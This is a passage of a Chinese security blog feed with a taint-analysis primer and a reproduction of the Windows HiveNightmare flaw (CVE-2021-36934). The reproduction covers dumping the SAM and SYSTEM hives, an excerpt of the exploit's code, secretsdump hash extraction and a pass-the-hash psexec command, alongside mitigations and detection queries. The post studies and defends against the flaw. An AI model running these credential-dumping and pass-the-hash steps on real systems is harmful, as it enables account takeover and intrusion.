<summary type="html"><h2 id="前情提要"><a href="#前情提要" class="headerlink" title="前情提要"></a>前情提要</h2><p>起gdb的时候发现自己pwndbg起不来。。。</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="pwndbg" scheme="https://f23y.github.io/tags/pwndbg/"/>
</entry>
<entry>
<title>小白学污点分析</title>
<link href="https://f23y.github.io/2022/01/18/%E5%B0%8F%E7%99%BD%E5%AD%A6%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90/"/>
<id>https://f23y.github.io/2022/01/18/%E5%B0%8F%E7%99%BD%E5%AD%A6%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90/</id>
<published>2022-01-17T17:33:09.000Z</published>
<updated>2025-09-27T11:01:40.173Z</updated>
<content type="html"><![CDATA[<p>(标题里的小白指我自己)</p><h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p> <strong>污点分析</strong>(Taint Analysis)技术是<strong>信息流</strong>分析技术的一种实践方法,在信息泄露检测、漏洞探测、逆向工程等方面有广泛的应用并被移植到各种不同的环境和平台当中。污点分析技术将系统或应用程序中的数据标记为污点或非污点,当污点数据根据信息流传播策略可影响到非污点数据时,则将该非污点数据的标记修改为污点,当污点标签最终随数据传播到指定的存储区域或者信息泄露点时,则认定该系统违反了信息流策略。根据污点分析目标软件是否运行, 通常可将其分为静态污点分析(Static Taint Analysis,STA)与动态污点分析(Dynamic Taint Analysis,DTA)。根据目标程序分析粒度不同,污点分析技术可分为粗粒度污点分析(Coarse-grained Taint Analysis)和细粒度污点分析(Fine-grained Taint Analysis)。</p><span id="more"></span><img src="https://pic.imgdb.cn/item/61e598dc2ab3f51d91737d16.png" style="zoom: 50%;" /><h2 id="0x01-污点分析原理"><a href="#0x01-污点分析原理" class="headerlink" title="0x01 污点分析原理"></a>0x01 污点分析原理</h2><p> 污点分析技术模型包括<strong>污点源</strong>、<strong>污点汇聚点</strong>和<strong>无害化处理</strong>等部分。</p><p> 污点源(source):污点信息在程序中的产生点,即直接引入不受信任的数据或者机密数据到系统中。</p><p> 污点汇聚点(sink):系统将污点数据输出到敏感数据区或者外界,造成敏感数据区被非法改写或者隐私数据泄露。其中敏感操作可归 纳为以下四种:(1) 内存分配函数; (2) 数组访问指令; (3) 循环控制; (4) 危险函数, 如 strcpy/printf/fprintf 等。 </p><p> 无害化处理(sanitizer):通过数据加密或重新赋值等操作使数据传播不再对系统的完整性和保密性产生危害。</p><p> 污点分析的处理过程可以分成 3 个阶段:(1) 识别污点源和汇聚点 (2) 污点传播分析 (3) 无害处理。</p><img src="https://pic.imgdb.cn/item/61e599392ab3f51d9173c657.png" style="zoom: 67%;" /><p> 污点数据主要通过数据间的依赖关系在系统或应用程序中进行传播,这种依赖关系又分为数据依赖和控制依赖。数据依赖主要包括程序中各变量间的直接赋值、数学计算等操作,控制依赖主要包括程序中各变量间的条件判断与指令跳转等情况。</p><p><img src="https://pic.imgdb.cn/item/61e5ab9e2ab3f51d91810c6b.png" alt="5.5_overview"></p><h2 id="0x02-静态污点分析"><a href="#0x02-静态污点分析" class="headerlink" title="0x02 静态污点分析"></a>0x02 静态污点分析</h2><p> 静态污点分析是指在不运行且不修改代码的前提下离线分析变量间数据和控制依赖关系,以检测污点数据能否从污点源传播到污点汇聚点。静态污点分析的对象是程序代码或中间表示(Intermediate Representation, IR)。静态污点分析的优点是代码覆盖率高, 缺点是不能获取程序真实的执行过程, 分析复杂且漏报率较高。可以学习LLVM IR并完成<a href="https://github.com/UofT-EcoSystem/CSCD70">CSCD70</a> 。</p><img src="https://pic.imgdb.cn/item/61e5c0a52ab3f51d918c0127.png" alt="LLVMIR" style="zoom: 80%;" /><h2 id="0x03-动态污点分析"><a href="#0x03-动态污点分析" class="headerlink" title="0x03 动态污点分析"></a>0x03 动态污点分析</h2><p> 动态污点分析是在目标程序运行过程中通过实时跟踪监控并记录程序变量、寄存器和内存等的值,确定污点数据能否从污点源传播到污点汇聚点。动态污点分析的主要过程由三个阶段组成:</p><p>1) 污点标记(污染源识别):将 source 点的输入数据标记为污点源数据,包括来自网络、文件及外部设备输入的外部数据。一般采用影子内存技术对污点数据进行标记,如果某寄存器或内存中存放的是污点数据,则影子内存将会生成一个污点数据结构的指针与该污点数据一一对应, 该污点数据结构保存的是与该污点相关信息,否则影子内存为空。为了跟踪污点数据的显示传播,需要在每个数据移动指令和算数指令执行前监控,当指令的结果被其中一个操作数污染后,把结果数据对应的影子内存设置为一个指针,指向源污染点操作数指向的数据结构。</p><img src="https://pic.imgdb.cn/item/61e59a5f2ab3f51d9174a4d6.jpg" style="zoom:50%;" /><p>2) 污点传播 (动态跟踪):在程序执行过程中跟踪污点数据的传播过程, 如果某个污点数据被复制到其他缓冲区, 或进行了一些运算, 将会导致其他内存数据变成不可信数据, 则将其标记为“被污染” (tainted)数据。动态污点跟踪通常基于三种机制:动态代码插桩(e.g. DynamoRio, Pin, Valgrind)、全系统模拟、虚拟机监视器。二进制代码级的污点分析有两种粒度,一是直接分析 x86 等指令集(效率更高),二 是中间语言(IR)。</p><img src="https://pic.imgdb.cn/item/61e59b232ab3f51d91753399.png" style="zoom:80%;" /><p>3) 攻击检测(策略及规则) :检查程序中是否有非法使用污点数据的情况,常见的包括检测跳转地址攻击、格式化字符串攻击及缓冲区溢出攻击等,若检测到非法使用,则终止程序继续运行并报告潜在的攻击漏洞。</p><img src="https://pic.imgdb.cn/item/61e59b3b2ab3f51d917547b1.png" style="zoom:80%;" /><h2 id="0x04-Clang-Static-Analyzer"><a href="#0x04-Clang-Static-Analyzer" class="headerlink" title="0x04 Clang Static Analyzer"></a>0x04 Clang Static Analyzer</h2><p>源码:<a href="https://code.woboq.org/llvm/clang/">https://code.woboq.org/llvm/clang/</a></p><p>文档:<a href="https://clang.llvm.org/docs/ClangStaticAnalyzer.html">https://clang.llvm.org/docs/ClangStaticAnalyzer.html</a></p><p>Clang AST: <a href="https://www.youtube.com/watch?v=VqCkCDFLSsc">https://www.youtube.com/watch?v=VqCkCDFLSsc</a></p><p>架构:Parser, ExprEngine, StateManager, ConstraintManager, StoreManager……(懒得画图)</p><p>可以尝试编写一些检查器。参考:<a href="https://zhuanlan.zhihu.com/p/369254889">https://zhuanlan.zhihu.com/p/369254889</a></p><p>也可以查看<a href="https://github.com/llvm/llvm-project/blob/e356027016c6365b3d8924f54c33e2c63d931492/clang/test/Analysis/Inputs/taint-generic-config.yaml">taint-generic-config</a>进一步思考。</p><p>困死了。。睡觉zzz</p><h2 id="0x05-参考链接"><a href="#0x05-参考链接" class="headerlink" title="0x05 参考链接"></a>0x05 参考链接</h2><p><a href="https://www.k0rz3n.com/2019/03/01/%E7%AE%80%E5%8D%95%E7%90%86%E8%A7%A3%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF/">https://www.k0rz3n.com/2019/03/01/%E7%AE%80%E5%8D%95%E7%90%86%E8%A7%A3%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF/</a></p><p><a href="https://www.bookstack.cn/read/CTF-All-In-One/doc-5.5_taint_analysis.md#%E5%8A%A8%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90">https://www.bookstack.cn/read/CTF-All-In-One/doc-5.5_taint_analysis.md#%E5%8A%A8%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90</a></p><p><a href="https://hexterisk.github.io/blog/posts/2020/05/03/taint-analysis/">https://hexterisk.github.io/blog/posts/2020/05/03/taint-analysis/</a></p><p><a href="https://hexterisk.github.io/blog/posts/2020/06/03/dynamic-binary-instrumentation-and-pin/">https://hexterisk.github.io/blog/posts/2020/06/03/dynamic-binary-instrumentation-and-pin/</a></p><p><a href="https://xueshu.baidu.com/usercenter/paper/show?paperid=1b0f00d0aw7g0tr0by4w0gn0cs524325&site=xueshu_se">https://xueshu.baidu.com/usercenter/paper/show?paperid=1b0f00d0aw7g0tr0by4w0gn0cs524325&site=xueshu_se</a></p><p><a href="https://xz.aliyun.com/t/7979">https://xz.aliyun.com/t/7979</a></p><p><a href="https://xueshu.baidu.com/usercenter/paper/show?paperid=2e4f5bd4cac517e72fd7fc80c74b047a&site=xueshu_se">https://xueshu.baidu.com/usercenter/paper/show?paperid=2e4f5bd4cac517e72fd7fc80c74b047a&site=xueshu_se</a></p><p><a href="https://arxiv.org/pdf/2007.05955.pdf">https://arxiv.org/pdf/2007.05955.pdf</a></p>]]></content>
<summary type="html"><p>(标题里的小白指我自己)</p>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p> <strong>污点分析</strong>(Taint Analysis)技术是<strong>信息流</strong>分析技术的一种实践方法,在信息泄露检测、漏洞探测、逆向工程等方面有广泛的应用并被移植到各种不同的环境和平台当中。污点分析技术将系统或应用程序中的数据标记为污点或非污点,当污点数据根据信息流传播策略可影响到非污点数据时,则将该非污点数据的标记修改为污点,当污点标签最终随数据传播到指定的存储区域或者信息泄露点时,则认定该系统违反了信息流策略。根据污点分析目标软件是否运行, 通常可将其分为静态污点分析(Static Taint Analysis,STA)与动态污点分析(Dynamic Taint Analysis,DTA)。根据目标程序分析粒度不同,污点分析技术可分为粗粒度污点分析(Coarse-grained Taint Analysis)和细粒度污点分析(Fine-grained Taint Analysis)。</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="taint analyzer" scheme="https://f23y.github.io/tags/taint-analyzer/"/>
</entry>
<entry>
<title>Windows提权漏洞:CVE-2021-36934(HiveNightmare)复现与分析</title>
<link href="https://f23y.github.io/2021/12/19/Windows%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%EF%BC%9ACVE-2021-36934(HiveNightmare)%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90/"/>
<id>https://f23y.github.io/2021/12/19/Windows%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%EF%BC%9ACVE-2021-36934(HiveNightmare)%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90/</id>
<published>2021-12-18T17:31:33.000Z</published>
<updated>2025-09-27T11:01:25.516Z</updated>
<content type="html"><![CDATA[<p>本来发在团队公众号上的,结果由于特殊原因不得不撤掉,就发在博客上吧,挺久了。。</p><h2 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 漏洞描述"></a>0x01 漏洞描述</h2><p> 该漏洞是由于Windows对多个系统文件(包括安全账户管理器(SAM))的访问控制列表(ACL)过于宽松所导致的特权提升漏洞。成功利用此漏洞的攻击者可以将普通用户权限提升至SYSTEM权限,并在目标机器上执行任意代码,从而达到控制目标系统的目的。该漏洞存在一定的前置利用条件,需要目标系统开启系统保护,并设置了系统还原点才可进行攻击。如果Win10 C盘大于128G保护模式会默认开启,并进行还原点备份,exp会从这个备份的卷影dump sam文件从而进行利用。</p><span id="more"></span><p>风险等级:</p><img src="https://pic.imgdb.cn/item/60fdeae15132923bf8f4ebfe.png" alt="1" style="zoom:80%;" /><p>影响版本:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Windows Server, version 20H2 (Server Core Installation)</span><br><span class="line">Windows 10 Version 20H2 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 20H2 for 32-bit Systems</span><br><span class="line">Windows 10 Version 20H2 for x64-based Systems</span><br><span class="line">Windows Server, version 2004 (Server Core installation)</span><br><span class="line">Windows 10 Version 2004 for x64-based Systems</span><br><span class="line">Windows 10 Version 2004 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 2004 for 32-bit Systems</span><br><span class="line">Windows 10 Version 21H1 for 32-bit Systems</span><br><span class="line">Windows 10 Version 21H1 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 21H1 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1909 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for 32-bit Systems</span><br><span class="line">Windows Server 2019 (Server Core installation)</span><br><span class="line">Windows Server 2019</span><br><span class="line">Windows 10 Version 1809 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1809 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1809 for x64-based Systems</span><br></pre></td></tr></table></figure><h2 id="0x02-漏洞复现"><a href="#0x02-漏洞复现" class="headerlink" title="0x02 漏洞复现"></a>0x02 漏洞复现</h2><p>使用Admin权限执行该命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls c:\Windows\System32\Config\SAM</span><br></pre></td></tr></table></figure><p>如果输出<code>BUILTIN\USERS:(I)(RX)</code>则漏洞存在。</p><img src="https://pic.imgdb.cn/item/60fdeaf55132923bf8f5107a.png" alt="2" style="zoom: 80%;" /><p>Jonas L在win11中发现权限访问问题,非管理员用户可以访问c:\Windows\System32\config\下的敏感配置,这其中包括了SAM这些凭证信息。作为非管理员通过这个权限问题,可以读取出管理的hash凭证。在内网中,我们便可以进行哈希传递这些横向移动。</p><img src="https://pic.imgdb.cn/item/60fdeb0e5132923bf8f53c46.png" alt="E6rsUghWYAgHD1d" /> <p>(使用FileTest来读取文件,通过createfile函数获取到sam的handle后,通过readfile来读取文件)</p><p>下载并运行exp, 读取SAM, SYSTEM, SECURITY hives。</p><img src="https://pic.imgdb.cn/item/60fdeb255132923bf8f56532.png" alt="2" style="zoom:80%;" /><p> 出现了三个新文件。</p><p> <img src="https://pic.imgdb.cn/item/60fdeb365132923bf8f58420.png" alt="3" style="zoom:80%;" /></p><p>将这三个文件拖入kali,使用impacket中的secretsdump.py拿到管理员账户的hash。</p><p><img src="https://pic.imgdb.cn/item/60fdeb4c5132923bf8f5ac6a.png" alt="4"></p><p>再用psexec.py打开目标主机cmd,然后为所欲为。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec.py -hashes 管理员账户hash administrator@目标主机ip cmd.exe</span><br></pre></td></tr></table></figure><h2 id="0x03-EXP分析"><a href="#0x03-EXP分析" class="headerlink" title="0x03 EXP分析"></a>0x03 EXP分析</h2><p> (好像也没啥可分析的.)</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//解决无法访问正在使用的SAM问题</span></span><br><span class="line"> hfile = <span class="built_in">CreateFile</span>(fullPath, GENERIC_READ, <span class="number">0</span>, <span class="literal">NULL</span>, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br></pre></td></tr></table></figure><p>然后主要就三段代码读取和转储SAM, SECURITY和SYSTEM.</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"> wcout << <span class="string">L"\nHiveNightmare v0.5 - dump registry hives as non-admin users\n\nSpecify maximum number of shadows to inspect with parameter if wanted, default is 15.\n\nRunning...\n\n"</span>;</span><br><span class="line"></span><br><span class="line"> HANDLE hFile;</span><br><span class="line"></span><br><span class="line"><span class="comment">//设置要读取敏感文件位置</span></span><br><span class="line"> TCHAR samLocation[] = <span class="string">L"Windows\\System32\\config\\SAM"</span>;</span><br><span class="line"> TCHAR securityLocation[] = <span class="string">L"Windows\\System32\\config\\SECURITY"</span>;</span><br><span class="line"> TCHAR systemLocation[] = <span class="string">L"Windows\\System32\\config\\SYSTEM"</span>;</span><br><span class="line"> TCHAR fileTime[<span class="number">200</span>];</span><br><span class="line"> TCHAR fileName[<span class="number">20</span>];</span><br><span class="line"></span><br><span class="line">hFile = <span class="built_in">getVssFileHandle</span>(samLocation, searchDepth);</span><br><span class="line"> <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE) {</span><br><span class="line"> wcout << <span class="string">"Could not open SAM :( Is System Protection not enabled or vulnerability fixed? Try increasing the number of VSS snapshots to search - list snapshots with vssadmin list shadows\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>; <span class="comment">//读取Windows\System32\config\SAM失败的错误处理</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="built_in">getFileTime</span>(hFile, fileTime, <span class="number">200</span>);</span><br><span class="line"> <span class="built_in">swprintf_s</span>(fileName, <span class="string">L"SAM-%s"</span>, fileTime); <span class="comment">//buggy if name too long</span></span><br><span class="line"> <span class="built_in">dumpHandleToFile</span>(hFile, fileName);</span><br><span class="line"> <span class="built_in">CloseHandle</span>(hFile); <span class="comment">//操作结束,关闭文件句柄</span></span><br><span class="line"> wcout << endl << <span class="string">L"Success: SAM hive from "</span> << fileTime << <span class="string">L" written out to current working directory as "</span> << fileName << endl << endl;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> <span class="comment">//下面就是跟读取SAM一样的步骤,去读取SECURITY和SYSTEM</span></span><br></pre></td></tr></table></figure><h2 id="0x04-缓解措施"><a href="#0x04-缓解措施" class="headerlink" title="0x04 缓解措施"></a>0x04 缓解措施</h2><p>目前微软官方暂未发布安全更新,建议用户通过临时缓解方法进行防护。</p><p>临时缓解方法:</p><ol><li>限制对 %windir%\system32\config 内容的访问</li></ol><p>以管理员身份打开命令提示符或 Windows PowerShell,运行以下命令:</p><p>icacls %windir%\system32\config*.* /inheritance:e</p><ol start="2"><li>删除卷影复制服务 (VSS) 卷影副本</li></ol><p>删除限制访问 %windir%\system32\config 之前存在的任何系统还原点和卷影卷。创建一个新的系统还原点(如果需要)。</p><p>注:变通办法的影响删除卷影副本可能会影响还原操作,包括使用第三方备份应用程序还原数据的能力。必须限制访问并删除卷影副本以防止利用该漏洞。</p><ol start="3"><li><p>运行修复脚本</p><p><a href="https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1">https://github.com/GossiTheDog/HiveNightmare/blob/master/Mitigation.ps1</a></p></li></ol><h2 id="0x05-检测"><a href="#0x05-检测" class="headerlink" title="0x05 检测"></a>0x05 检测</h2><p>使用EDR工具进行检测</p><p>Microsoft Defender for Endpoint</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/CVE-2021-36934-HiveNightmare-Defender.ahq">ThreatHunting/CVE-2021–36934-HiveNightmare-Defender.ahq at master · GossiTheDog/ThreatHunting (github.com)</a></p><p><a href="https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWNwQrCQAxE51zwH5b-h4ei7VVRf6DUtS0stthQEfx4X1Pw5E2W7CSTmcxeUbN6NWBJF3WXaVLQm3qqg3lQQQUaQzmguOil0dktLyjXgd2qLZQcTScwqaaLun79S5rhz39kVFxPaJf56M4OtvFMY-7ByfPObGqUA_4d_-gXN8r-uLlyN5iW6QPURz47GgEAAA&runQuery=true&timeRangeId=week">M365 Defender query link</a></p><p>Mcafee EDR block rule</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/EDR-BlockRules/CVE-2021-36934-HiveNightmare-Mcafee">ThreatHunting/CVE-2021–36934-HiveNightmare-Mcafee at master · GossiTheDog/ThreatHunting (github.com)</a></p><p>Azure Sentinel</p><p><a href="https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/CVE-2021-36934-HiveNightmare-Sentinel-Events">ThreatHunting/CVE-2021–36934-HiveNightmare-Sentinel-Events at master · GossiTheDog/ThreatHunting (github.com)</a></p><h2 id="0x06-参考链接"><a href="#0x06-参考链接" class="headerlink" title="0x06 参考链接"></a>0x06 参考链接</h2><p><a href="https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5">https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5</a></p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934</a></p><p><a href="https://github.com/GossiTheDog/HiveNightmare/">https://github.com/GossiTheDog/HiveNightmare/</a></p><p>小声bb:感觉实际利用场景不太大,除非结合诱导下载之类的。。(社工yyds)</p>]]></content>
<summary type="html"><p>本来发在团队公众号上的,结果由于特殊原因不得不撤掉,就发在博客上吧,挺久了。。</p>
<h2 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 漏洞描述"></a>0x01 漏洞描述</h2><p> 该漏洞是由于Windows对多个系统文件(包括安全账户管理器(SAM))的访问控制列表(ACL)过于宽松所导致的特权提升漏洞。成功利用此漏洞的攻击者可以将普通用户权限提升至SYSTEM权限,并在目标机器上执行任意代码,从而达到控制目标系统的目的。该漏洞存在一定的前置利用条件,需要目标系统开启系统保护,并设置了系统还原点才可进行攻击。如果Win10 C盘大于128G保护模式会默认开启,并进行还原点备份,exp会从这个备份的卷影dump sam文件从而进行利用。</p></summary>
<category term="CI/CD" scheme="https://f23y.github.io/categories/CI-CD/"/>
<category term="HiveNightmare" scheme="https://f23y.github.io/tags/HiveNightmare/"/>
</entry>
</feed>